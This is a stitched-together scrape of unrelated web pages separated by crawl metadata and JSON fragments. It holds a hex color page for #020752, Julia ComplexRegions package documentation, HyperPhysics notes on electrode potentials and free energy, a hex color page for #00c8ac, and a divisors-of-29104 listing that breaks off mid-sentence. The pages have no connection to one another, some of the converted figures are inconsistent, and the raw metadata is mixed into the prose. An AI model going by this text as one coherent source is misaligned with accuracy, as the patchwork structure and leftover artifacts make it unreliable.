"# #020752 Color Information\n\nIn a RGB color space, hex #020752 is composed of 0.8% red, 2.7% green and 32.2% blue. Whereas in a CMYK color space, it is composed of 97.6% cyan, 91.5% magenta, 0% yellow and 67.8% black. It has a hue angle of 236.3 degrees, a saturation of 95.2% and a lightness of 16.5%. #020752 color hex could be obtained by blending #040ea4 with #000000. Closest websafe color is: #000066.\n\n• R 1\n• G 3\n• B 32\nRGB color chart\n• C 98\n• M 91\n• Y 0\n• K 68\nCMYK color chart\n\n#020752 color description : Very dark blue.\n\n# #020752 Color Conversion\n\nThe hexadecimal color #020752 has RGB values of R:2, G:7, B:82 and CMYK values of C:0.98, M:0.91, Y:0, K:0.68. Its decimal value is 132946.\n\nHex triplet RGB Decimal 020752 `#020752` 2, 7, 82 `rgb(2,7,82)` 0.8, 2.7, 32.2 `rgb(0.8%,2.7%,32.2%)` 98, 91, 0, 68 236.3°, 95.2, 16.5 `hsl(236.3,95.2%,16.5%)` 236.3°, 97.6, 32.2 000066 `#000066`\nCIE-LAB 6.991, 29.675, -44.288 1.624, 0.774, 8.046 0.155, 0.074, 0.774 6.991, 53.31, 303.824 6.991, -2.185, -25.624 8.797, 17.55, -48.068 00000010, 00000111, 01010010\n\n# Color Schemes with #020752\n\n• #020752\n``#020752` `rgb(2,7,82)``\n• #524d02\n``#524d02` `rgb(82,77,2)``\nComplementary Color\n• #022f52\n``#022f52` `rgb(2,47,82)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #250252\n``#250252` `rgb(37,2,82)``\nAnalogous Color\n• #2f5202\n``#2f5202` `rgb(47,82,2)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #522502\n``#522502` `rgb(82,37,2)``\nSplit Complementary Color\n• #075202\n``#075202` `rgb(7,82,2)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #520207\n``#520207` `rgb(82,2,7)``\n• #02524d\n``#02524d` `rgb(2,82,77)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #520207\n``#520207` `rgb(82,2,7)``\n• #524d02\n``#524d02` `rgb(82,77,2)``\n• #000107\n``#000107` `rgb(0,1,7)``\n• #010320\n``#010320` `rgb(1,3,32)``\n• #010539\n``#010539` `rgb(1,5,57)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #03096b\n``#03096b` `rgb(3,9,107)``\n• #030b84\n``#030b84` `rgb(3,11,132)``\n• #040d9d\n``#040d9d` `rgb(4,13,157)``\nMonochromatic Color\n\n# Alternatives to #020752\n\nBelow, you can see some colors close to #020752. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #021b52\n``#021b52` `rgb(2,27,82)``\n• #021452\n``#021452` `rgb(2,20,82)``\n• #020e52\n``#020e52` `rgb(2,14,82)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #040252\n``#040252` `rgb(4,2,82)``\n• #0a0252\n``#0a0252` `rgb(10,2,82)``\n• #110252\n``#110252` `rgb(17,2,82)``\nSimilar Colors\n\n# #020752 Preview\n\nThis text has a font color of #020752.\n\n``<span style=\"color:#020752;\">Text here</span>``\n#020752 background color\n\nThis paragraph has a background color of #020752.\n\n``<p style=\"background-color:#020752;\">Content here</p>``\n#020752 border color\n\nThis element has a border color of #020752.\n\n``<div style=\"border:1px solid #020752;\">Content here</div>``\nCSS codes\n``.text {color:#020752;}``\n``.background {background-color:#020752;}``\n``.border {border:1px solid #020752;}``\n\n# Shades and Tints of #020752\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000005 is the darkest color, while #f1f2ff is the lightest one.\n\n• #000005\n``#000005` `rgb(0,0,5)``\n• #010219\n``#010219` `rgb(1,2,25)``\n• #01042c\n``#01042c` `rgb(1,4,44)``\n• #02053f\n``#02053f` `rgb(2,5,63)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #020965\n``#020965` `rgb(2,9,101)``\n• #030a78\n``#030a78` `rgb(3,10,120)``\n• #030c8b\n``#030c8b` `rgb(3,12,139)``\n• #040e9f\n``#040e9f` `rgb(4,14,159)``\n• #040fb2\n``#040fb2` `rgb(4,15,178)``\n• #0511c5\n``#0511c5` `rgb(5,17,197)``\n• #0512d8\n``#0512d8` `rgb(5,18,216)``\n• #0614eb\n``#0614eb` `rgb(6,20,235)``\n• #0b1af9\n``#0b1af9` `rgb(11,26,249)``\n• #1f2cfa\n``#1f2cfa` `rgb(31,44,250)``\n• #323efa\n``#323efa` `rgb(50,62,250)``\n• #4550fa\n``#4550fa` `rgb(69,80,250)``\n• #5862fb\n``#5862fb` `rgb(88,98,251)``\n• #6b74fb\n``#6b74fb` `rgb(107,116,251)``\n• #7e86fc\n``#7e86fc` `rgb(126,134,252)``\n• #9298fc\n``#9298fc` `rgb(146,152,252)``\n• #a5aafd\n``#a5aafd` `rgb(165,170,253)``\n• #b8bcfd\n``#b8bcfd` `rgb(184,188,253)``\n• #cbcefe\n``#cbcefe` `rgb(203,206,254)``\n• #dee0fe\n``#dee0fe` `rgb(222,224,254)``\n• #f1f2ff\n``#f1f2ff` `rgb(241,242,255)``\nTint Color Variation\n\n# Tones of #020752\n\nA tone is produced by adding gray to any pure hue. In this case, #29292b is the less saturated color, while #020752 is the most saturated one.\n\n• #29292b\n``#29292b` `rgb(41,41,43)``\n• #26262e\n``#26262e` `rgb(38,38,46)``\n• #222332\n``#222332` `rgb(34,35,50)``\n• #1f2035\n``#1f2035` `rgb(31,32,53)``\n• #1c1e38\n``#1c1e38` `rgb(28,30,56)``\n• #191b3b\n``#191b3b` `rgb(25,27,59)``\n• #15183f\n``#15183f` `rgb(21,24,63)``\n• #121542\n``#121542` `rgb(18,21,66)``\n• #0f1245\n``#0f1245` `rgb(15,18,69)``\n• #0c0f48\n``#0c0f48` `rgb(12,15,72)``\n• #080d4c\n``#080d4c` `rgb(8,13,76)``\n• #050a4f\n``#050a4f` `rgb(5,10,79)``\n• #020752\n``#020752` `rgb(2,7,82)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #020752 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.53391784,"math_prob":0.7047469,"size":3630,"snap":"2019-51-2020-05","text_gpt3_token_len":1596,"char_repetition_ratio":0.13237728,"word_repetition_ratio":0.011090573,"special_character_ratio":0.57052344,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9940744,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-13T08:26:46Z\",\"WARC-Record-ID\":\"<urn:uuid:4bbe7084-f203-4d72-b0f3-1a98a422ef7f>\",\"Content-Length\":\"36134\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15f48f01-15dd-4dd6-8282-23f547d172e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb312ae9-2b94-4037-9713-0b2061c91209>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/020752\",\"WARC-Payload-Digest\":\"sha1:AXQS4XFIFVYMAM4ZK54SASPACEPBA3PY\",\"WARC-Block-Digest\":\"sha1:7T7SBDD4KX5VDCH7ORGCXJWRZU7C55KQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540551267.14_warc_CC-MAIN-20191213071155-20191213095155-00208.warc.gz\"}"} |
https://complexvariables.github.io/ComplexRegions.jl/stable/ | [
"Introduction\n\n# ComplexRegions\n\nThis package provides types and methods that are useful for working with curves and regions in the (extended) complex plane.\n\nMost functionality is provided through Julia types (roughly equivalent to classes in an object-oriented language). Per Julia conventions, these are all capitalized. You use these capitalized names to create values of the type; e.g., Segment and Circle.\n\nOther functions (methods, in Julia terms) may create values of these types, but since they are not distinct types themselves, they are not capitalized. For example, the `rectangle` method creates a Polygon.\n\nThe methods in this package should work not only with the built-in `Complex` type, but also with the `Polar` and `Spherical` types from the `ComplexValues` package, which it re-exports.\n\n## Abstract types\n\nAll `abstract` types have names starting with `Abstract`. You probably won't encounter them unless you want to extend the provided functionality.\n\nAn abstract type cannot itself be instantiated as a value. They serve as supertypes that collect common-denominator functionality, much like an interface in other languages. For example, any `AbstractCurve` is supposed to provide functions for finding points, tangents, and normals along the curve. Specific subtypes such as a Ray or Arc provide additional specialized functionalities appropriate to the subtypes.\n\n## Curve, Path, and Region\n\nA curve is meant to be a smooth, non-self-intersecting curve in the extended complex plane. There is a generic Curve type that requires you to specify an explicit parameterization that is not checked for smoothness or even continuity. Implementations are given for more specific types of curve.\n\nA path is a piecewise-continuous complex-valued path. In practice a Path can be specified as an array of curves. The path is checked for continuity at creation time. The most important provided specific path types are Polygon and CircularPolygon.\n\nBoth curves and paths have closed variants. These are additionally checked that the initial and final points are the same.\n\nOne atypical aspect of curves and paths, even \"closed\" ones, is that they lie in the extended or compactified complex plane and thus may be unbounded. For instance, a line in the plane may be interpreted as a circle on the Riemann sphere, and is thus a \"closed\" curve passing through infinity.\n\nA region is an open region in the extended plane bounded by a closed curve or path.\n\nSome examples:\n\n``````julia> ℓ = Line(1/2,1/2+1im) # line through 0.5 and 0.5+1i\nLine{Complex{Float64}} in the complex plane:\nthrough (0.5 + 0.0im) parallel to (0.0 + 1.0im)\n\njulia> c = 1 / ℓ # a circle\nCircle{Complex{Float64}} in the complex plane:\ncentered at (1.0 + 0.0im) with radius 1.0, negatively oriented\n\njulia> intersect(ℓ,c)\n2-element Array{Complex{Float64},1}:\n0.5 + 0.8660254037844386im\n0.5 - 0.8660254037844386im\n\njulia> plot(ℓ); plot!(c)\nPlot{Plots.GRBackend() n=2}``````",
null,
"``````julia> plot(Spherical(ℓ)); plot!(Spherical(c))\nPlot{Plots.GRBackend() n=40}``````",
null,
"``````julia> reflect(-1,c) # reflection of a point through the circle\n0.5 + 0.0im\n\njulia> plot(interior(ℓ)) # plot a half-plane\nPlot{Plots.GRBackend() n=1}``````",
null,
"``````julia> h = n_gon(7)\nPolygon with 7 vertices:\n1.0 + 0.0im, interior angle 0.7142857142857143⋅π\n0.6234898018587336 + 0.7818314824680298im, interior angle 0.7142857142857143⋅π\n-0.22252093395631434 + 0.9749279121818236im, interior angle 0.7142857142857143⋅π\n-0.900968867902419 + 0.43388373911755823im, interior angle 0.7142857142857143⋅π\n-0.9009688679024191 - 0.433883739117558im, interior angle 0.7142857142857143⋅π\n-0.2225209339563146 - 0.9749279121818236im, interior angle 0.7142857142857143⋅π\n0.6234898018587334 - 0.7818314824680299im, interior angle 0.7142857142857143⋅π\n\njulia> plot(h);\n\njulia> for k in 1:7\nz = exp(k*2im*π/20)\nplot!(z*h - 0.5k - 0.1im*k^2)\nend``````",
null,
"``````julia> p = Polygon([0,-1im,(0,0),1im,(pi,pi)]) # channel with a step\nPolygon with 5 vertices:\n0.0 + 0.0im, interior angle 1.5⋅π\n0.0 - 1.0im, interior angle 0.5⋅π\nInf + 0.0im, interior angle 0.0⋅π\n0.0 + 1.0im, interior angle 1.0⋅π\nInf + 0.0im, interior angle 0.0⋅π\n\njulia> plot(interior(p))\nPlot{Plots.GRBackend() n=1}``````",
null,
"## Tolerance\n\nBoundaries and endpoints are not well-posed ideas in floating-point, since an arbitrarily small perturbation to a value can move a point on or off of them. Thus many concepts in the package such as intersection or continuity are checked only up to a small tolerance. This value can be set on a per-call basis, or by using global defaults.\n\n## Global defaults\n\nFor work at the REPL, it's convenient to be able to set an influential parameter just once rather than in multiple calls. This mechanism is provided via `ComplexRegions.default`. You can see all the default parameters and values as follows:\n\n``````julia> ComplexRegions.default()\nDict{Symbol,Float64} with 1 entry:\n:tol => 1.0e-12``````\n\nChanging them is done with the same function:\n\n``````julia> ComplexRegions.default(tol=1e-8)\n[ Info: Default value of `tol` set to 1.0e-8.``````\n\nBe advised that this type of \"stateful\" computing brings some subtle undesirable consequences. For example, if the global default `tol` is changed in a future release of the package, existing code could give different results when testing for interior points. If maximum reproducibility is a concern, you should develop the habit of setting all defaults yourself at the beginning of your code."
] | [
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/line_circle.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/line_circle_sphere.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/halfplane.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/heptagons.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/channel.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8133333,"math_prob":0.8757364,"size":5299,"snap":"2020-45-2020-50","text_gpt3_token_len":1500,"char_repetition_ratio":0.12464589,"word_repetition_ratio":0.0051746443,"special_character_ratio":0.30439705,"punctuation_ratio":0.15589353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96103024,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T17:14:39Z\",\"WARC-Record-ID\":\"<urn:uuid:dc905fcd-37f9-418c-80d3-9209eb8a37e8>\",\"Content-Length\":\"10768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:79c083ea-9445-4705-a765-88f70aaa5ff2>\",\"WARC-Concurrent-To\":\"<urn:uuid:54b10600-e975-4c9f-98e1-04b574f7b574>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://complexvariables.github.io/ComplexRegions.jl/stable/\",\"WARC-Payload-Digest\":\"sha1:K72OMQ522BUH4GDDA3CECLTAOTNTBP34\",\"WARC-Block-Digest\":\"sha1:D4RTMHFWTXQUZTIQKN7DDKHXKUG6GIXM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107904834.82_warc_CC-MAIN-20201029154446-20201029184446-00113.warc.gz\"}"} |
http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/electrode2.html | [
"# Strengths of Oxidizing and Reducing Agents\n\nThe strengths of oxidizing and reducing agents are indicated by their standard electrode potentials. A sample from the table of standard potentials shows the extremes of the table.\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Li+(aq) + e- → Li(s) -3.04 K+(aq) + e- → K(s) -2.92 Ca2+(aq) + 2e- → Ca(s) -2.76 Na+(aq) + e- → Na(s) -2.71 Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e-→ Cu(s) 0.34 O3(g) + 2H+(aq) + 2e- → O2(g) + H2O(l) 2.07 F2(g) + 2e-→ 2F-(aq) 2.87\n\nThe values for the table entries are reduction potentials, so lithium at the top of the list has the most negative number, indicating that it is the strongest reducing agent. The strongest oxidizing agent is fluorine with the largest positive number for standard electrode potential.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back\n\n# Free Energy and Electrode Potentials\n\nThe cell potential of a voltaic cell is a measure of the maximum amount of energy per unit charge which is available to do work when charge is transferred through an external circuit. This maximum work is equal to the change in Gibbs free energy, ΔG, in the reaction. These relationships can be expressed as\n\nMaximum work = ΔG = -nFE°cell\n\nwhere n is the number of electrons transferred per mole and F is the Faraday constant.\n\nConsider the historic Daniell cell in which zinc and copper were used as electrodes. The data from the table of standard electrode potentials is\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e- → Cu(s) 0.34\n\nThe standard cell potential is then E°cell = 1.1 volt and 2 electrons are transferred per mole of reactant. The change in free energy is then\n\nΔG = -nFE°cell = -2 x 96,485 coul/mole x 1.10 joule/coul = -212 kJ\n\nThis relationship with free energy can be used in the opposite direction as well. From a table of thermodynamic quantities, the free energy changes for the ions under standard conditions are\n\nZn2+(aq), ΔG = -147.21 kJ/mol\n\nCu2+(aq), ΔG = 64.98 kJ/mol\n\nSince the Zn ion is produced and the Cu ion is reduced in the cell process, the net change in free energy is -212 kJ/mol, as we obtained above. Starting from these free energy changes, we could have calculated the cell potential of 1.1 volts by reversing the above calculation.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back\n\n# Electrode Potentials and Equilibrium Constants\n\nThe cell potential of a voltaic cell is a measure of the maximum amount of energy per unit charge which is available to do work when charge is transferred through an external circuit. This maximum work is equal to the change in Gibbs free energy, ΔG, in the reaction. These relationships can be expressed as\n\nMaximum work = ΔG = -nFE°cell\n\nwhere n is the number of electrons transferred per mole and F is the Faraday constant.\n\nThis free energy change can also be related to the equilibrium constant K\n\nΔG = -RT ln K\n\nCombining these relationships allows us to express the cell potential in terms of the equilibrium constant.",
null,
"Consider the historic Daniell cell in which zinc and copper were used as electrodes. The data from the table of standard electrode potentials is\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e- → Cu(s) 0.34\n\nThe standard cell potential is then E°cell = 1.1 volt and 2 electrons are transferred per mole of reactant. The relationship for the equilibrium constant is then",
null,
"This extremely high value for the equilibrium constant confirms that the reaction of the Daniell cell is indeed spontaneous and that it will proceed until the reactants are exhausted.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back"
] | [
null,
"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/imgche/emfequ.png",
null,
"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/imgche/emfequ2.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8781465,"math_prob":0.97895616,"size":3290,"snap":"2020-34-2020-40","text_gpt3_token_len":743,"char_repetition_ratio":0.12659769,"word_repetition_ratio":0.5009074,"special_character_ratio":0.2024316,"punctuation_ratio":0.061643835,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99418133,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T06:24:08Z\",\"WARC-Record-ID\":\"<urn:uuid:df20cdc5-dcdd-4436-94d6-cc0dbcbc97c8>\",\"Content-Length\":\"9755\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:954c3800-bc3a-453c-b2f8-81bad965613c>\",\"WARC-Concurrent-To\":\"<urn:uuid:58207984-8d45-4ad8-b6f2-8d827776bf89>\",\"WARC-IP-Address\":\"131.96.55.77\",\"WARC-Target-URI\":\"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/electrode2.html\",\"WARC-Payload-Digest\":\"sha1:WSKHQW6RARRD7WJAX57VSOEWNJRPAR4S\",\"WARC-Block-Digest\":\"sha1:WE3OHMWNHGODA35IMJN66PW5S2HFFGB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401585213.82_warc_CC-MAIN-20200928041630-20200928071630-00448.warc.gz\"}"} |
https://www.colorhexa.com/00c8ac | [
"# #00c8ac Color Information\n\nIn a RGB color space, hex #00c8ac is composed of 0% red, 78.4% green and 67.5% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 14% yellow and 21.6% black. It has a hue angle of 171.6 degrees, a saturation of 100% and a lightness of 39.2%. #00c8ac color hex could be obtained by blending #00ffff with #009159. Closest websafe color is: #00cc99.\n\n• R 0\n• G 78\n• B 67\nRGB color chart\n• C 100\n• M 0\n• Y 14\n• K 22\nCMYK color chart\n\n#00c8ac color description : Strong cyan.\n\n# #00c8ac Color Conversion\n\nThe hexadecimal color #00c8ac has RGB values of R:0, G:200, B:172 and CMYK values of C:1, M:0, Y:0.14, K:0.22. Its decimal value is 51372.\n\nHex triplet RGB Decimal 00c8ac `#00c8ac` 0, 200, 172 `rgb(0,200,172)` 0, 78.4, 67.5 `rgb(0%,78.4%,67.5%)` 100, 0, 14, 22 171.6°, 100, 39.2 `hsl(171.6,100%,39.2%)` 171.6°, 100, 78.4 00cc99 `#00cc99`\nCIE-LAB 72.418, -48.032, 2.272 28.098, 44.284, 46.094 0.237, 0.374, 44.284 72.418, 48.085, 177.292 72.418, -58.87, 10.809 66.546, -41.088, 5.514 00000000, 11001000, 10101100\n\n# Color Schemes with #00c8ac\n\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #c8001c\n``#c8001c` `rgb(200,0,28)``\nComplementary Color\n• #00c848\n``#00c848` `rgb(0,200,72)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #0080c8\n``#0080c8` `rgb(0,128,200)``\nAnalogous Color\n• #c84800\n``#c84800` `rgb(200,72,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #c80080\n``#c80080` `rgb(200,0,128)``\nSplit Complementary Color\n• #c8ac00\n``#c8ac00` `rgb(200,172,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #ac00c8\n``#ac00c8` `rgb(172,0,200)``\n• #1cc800\n``#1cc800` `rgb(28,200,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #ac00c8\n``#ac00c8` `rgb(172,0,200)``\n• #c8001c\n``#c8001c` `rgb(200,0,28)``\n• #007c6a\n``#007c6a` `rgb(0,124,106)``\n• #009580\n``#009580` `rgb(0,149,128)``\n• #00af96\n``#00af96` `rgb(0,175,150)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00e2c2\n``#00e2c2` `rgb(0,226,194)``\n• #00fbd8\n``#00fbd8` `rgb(0,251,216)``\n• #16ffde\n``#16ffde` `rgb(22,255,222)``\nMonochromatic Color\n\n# Alternatives to #00c8ac\n\nBelow, you can see some colors close to #00c8ac. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #00c87a\n``#00c87a` `rgb(0,200,122)``\n• #00c88b\n``#00c88b` `rgb(0,200,139)``\n• #00c89b\n``#00c89b` `rgb(0,200,155)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00c8bd\n``#00c8bd` `rgb(0,200,189)``\n• #00c3c8\n``#00c3c8` `rgb(0,195,200)``\n• #00b2c8\n``#00b2c8` `rgb(0,178,200)``\nSimilar Colors\n\n# #00c8ac Preview\n\nThis text has a font color of #00c8ac.\n\n``<span style=\"color:#00c8ac;\">Text here</span>``\n#00c8ac background color\n\nThis paragraph has a background color of #00c8ac.\n\n``<p style=\"background-color:#00c8ac;\">Content here</p>``\n#00c8ac border color\n\nThis element has a border color of #00c8ac.\n\n``<div style=\"border:1px solid #00c8ac;\">Content here</div>``\nCSS codes\n``.text {color:#00c8ac;}``\n``.background {background-color:#00c8ac;}``\n``.border {border:1px solid #00c8ac;}``\n\n# Shades and Tints of #00c8ac\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000403 is the darkest color, while #effffd is the lightest one.\n\n• #000403\n``#000403` `rgb(0,4,3)``\n• #001714\n``#001714` `rgb(0,23,20)``\n• #002b25\n``#002b25` `rgb(0,43,37)``\n• #003f36\n``#003f36` `rgb(0,63,54)``\n• #005247\n``#005247` `rgb(0,82,71)``\n• #006658\n``#006658` `rgb(0,102,88)``\n• #007a69\n``#007a69` `rgb(0,122,105)``\n• #008d79\n``#008d79` `rgb(0,141,121)``\n• #00a18a\n``#00a18a` `rgb(0,161,138)``\n• #00b49b\n``#00b49b` `rgb(0,180,155)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00dcbd\n``#00dcbd` `rgb(0,220,189)``\n• #00efce\n``#00efce` `rgb(0,239,206)``\n• #04ffdc\n``#04ffdc` `rgb(4,255,220)``\n• #17ffdf\n``#17ffdf` `rgb(23,255,223)``\n• #2bffe1\n``#2bffe1` `rgb(43,255,225)``\n• #3fffe4\n``#3fffe4` `rgb(63,255,228)``\n• #52ffe7\n``#52ffe7` `rgb(82,255,231)``\n• #66ffea\n``#66ffea` `rgb(102,255,234)``\n• #7affec\n``#7affec` `rgb(122,255,236)``\n• #8dffef\n``#8dffef` `rgb(141,255,239)``\n• #a1fff2\n``#a1fff2` `rgb(161,255,242)``\n• #b4fff5\n``#b4fff5` `rgb(180,255,245)``\n• #c8fff7\n``#c8fff7` `rgb(200,255,247)``\n• #dcfffa\n``#dcfffa` `rgb(220,255,250)``\n• #effffd\n``#effffd` `rgb(239,255,253)``\nTint Color Variation\n\n# Tones of #00c8ac\n\nA tone is produced by adding gray to any pure hue. In this case, #5c6c6a is the less saturated color, while #00c8ac is the most saturated one.\n\n• #5c6c6a\n``#5c6c6a` `rgb(92,108,106)``\n• #55736f\n``#55736f` `rgb(85,115,111)``\n• #4d7b75\n``#4d7b75` `rgb(77,123,117)``\n• #45837a\n``#45837a` `rgb(69,131,122)``\n• #3e8a80\n``#3e8a80` `rgb(62,138,128)``\n• #369285\n``#369285` `rgb(54,146,133)``\n• #2e9a8b\n``#2e9a8b` `rgb(46,154,139)``\n• #26a290\n``#26a290` `rgb(38,162,144)``\n• #1fa996\n``#1fa996` `rgb(31,169,150)``\n• #17b19b\n``#17b19b` `rgb(23,177,155)``\n• #0fb9a1\n``#0fb9a1` `rgb(15,185,161)``\n• #08c0a6\n``#08c0a6` `rgb(8,192,166)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00c8ac is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.512665,"math_prob":0.8118361,"size":3676,"snap":"2021-43-2021-49","text_gpt3_token_len":1631,"char_repetition_ratio":0.13562092,"word_repetition_ratio":0.011111111,"special_character_ratio":0.53862894,"punctuation_ratio":0.23216309,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9792466,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T18:50:34Z\",\"WARC-Record-ID\":\"<urn:uuid:e79b32b7-4993-4c63-8136-8e8a17e093bc>\",\"Content-Length\":\"36134\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f12e167-9adf-4101-bb5c-95714afceda3>\",\"WARC-Concurrent-To\":\"<urn:uuid:aa7012b4-2418-4bd6-86cd-65f4ace88e28>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00c8ac\",\"WARC-Payload-Digest\":\"sha1:SY4WZWYEISLLCSNISYH3JCBHRFHAOVWI\",\"WARC-Block-Digest\":\"sha1:ZFO3ALZBHBVOQUYB7AJ5X2ARNCTRBTWU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588398.42_warc_CC-MAIN-20211028162638-20211028192638-00561.warc.gz\"}"} |
https://calculomates.com/en/divisors/of/29104 | [
"# Divisors of 29104\n\n## Divisors of 29104\n\nThe list of all positive divisors (that is, the list of all integers that divide 22) is as follows :\n\nAccordingly:\n\n29104 is multiplo of 1\n\n29104 is multiplo of 2\n\n29104 is multiplo of 4\n\n29104 is multiplo of 8\n\n29104 is multiplo of 16\n\n29104 is multiplo of 17\n\n29104 is multiplo of 34\n\n29104 is multiplo of 68\n\n29104 is multiplo of 107\n\n29104 is multiplo of 136\n\n29104 is multiplo of 214\n\n29104 is multiplo of 272\n\n29104 is multiplo of 428\n\n29104 is multiplo of 856\n\n29104 is multiplo of 1712\n\n29104 is multiplo of 1819\n\n29104 is multiplo of 3638\n\n29104 is multiplo of 7276\n\n29104 is multiplo of 14552\n\n29104 has 19 positive divisors\n\n## Parity of 29104\n\nIn addition we can say of the number 29104 that it is even\n\n29104 is an even number, as it is divisible by 2 : 29104/2 = 14552\n\n## The factors for 29104\n\nThe factors for 29104 are all the numbers between -29104 and 29104 , which divide 29104 without leaving any remainder. Since 29104 divided by -29104 is an integer, -29104 is a factor of 29104 .\n\nSince 29104 divided by -29104 is a whole number, -29104 is a factor of 29104\n\nSince 29104 divided by -14552 is a whole number, -14552 is a factor of 